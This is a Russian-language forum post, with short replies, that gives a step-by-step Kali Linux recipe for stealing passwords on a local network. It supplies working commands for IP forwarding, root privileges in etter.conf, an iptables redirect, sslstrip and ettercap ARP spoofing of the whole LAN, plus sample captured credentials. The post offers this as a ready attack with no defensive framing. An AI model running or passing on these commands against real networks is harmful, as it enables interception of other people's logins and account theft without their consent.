Как перехватить пароли в локальной сети с помощью
-
Как перехватить пароли в локальной сети с помощью Kali Linux
Итак, наш алгоритм действий:-
Настраиваем ip_forward
-
Настраиваем etter.conf
-
Настраиваем iptables
-
Запускаем sslstrip
-
Запускаем ettercap с плагином autoadd
-
Пьем пивасик
-
Приходим и радуемся.
-
Открываем консоль и пишем:
Код
echo '1' > /proc/sys/net/ipv4/ip_forward
- Открываем консоль опять же:
Пишем:
Код
leafpad /etc/etter.conf
UPD by 14.04.2014: Если открывается пустое окно, то пишем это:
Код
leafpad /etc/ettercap/etter.conf
В поле [privs] находим строчки:
Код
ec_uid = %тут какое-то значение% # nobody is the default
ec_gid = %тут какое-то значение% # nobody is the defaultИзменяем %тут какое-то значение% на 0.
В итоге будет так:
Код
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the defaultДалее жмем ctrl+f и вводим туда iptables
Нас кидает на следующие строчки:
Кодif you use iptables:
#redir_command_on = «iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»
#redir_command_off = «iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»Раскомментируем redir_command_on и redir_command_off
В итоге будет так:
Код
if you use iptables:
redir_command_on = «iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»
redir_command_off = «iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport»- Теперь нам нужно настроить iptables:
Вводим команду:
Код
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Теперь весь трафик с 80 порта у нас будет переадресовываться на 8080, на котором мы потом запустим sslstrip
- Активируем sslstip:
Код
sslstrip -l 8080 -a
-l — порт на котором слушаем
-a — снифать все- Запуск атаки
Код
ettercap -T -q -P autoadd -i wlan0 -M arp:remote // //
-T — указываем, что в текстовом режиме
-q — не показываем содержимое пакетов, только пароли
-P autoadd — подключаем плагин autoadd, чтобы у нас все будущие клиенты сети тоже были атакованы
-i wlan0 — указываем, что наш интерфейс это wlan0
-M arp:remote — указываем, что нам нужен именно ARP Spoofing
// // — атакуем всю LAN сетьИтак, атака запущена.
Чтобы ее отменить нужно нажать q на англ раскладки ( Не CTRL+C! А именно q, чтобы восстановить arp таблицу! )
-
Теперь ждем
-
Как только кто-то залогинится куда либо, то у нас в терминале с ettercap будет строка вида:
Код
HTTP: 217.69.139.60:80 -> USER: offsec PASS: password123 INFO:
Где после USER идет логин, после PASS идет пароль, после INFO будет ссылка
(кто щарит поставте + ) :E: -
-
Закладка добавлена
-
а все снифферы из инета удалили что ли?
-
спасибо
-
Плюс поставить? Уже.
-
спс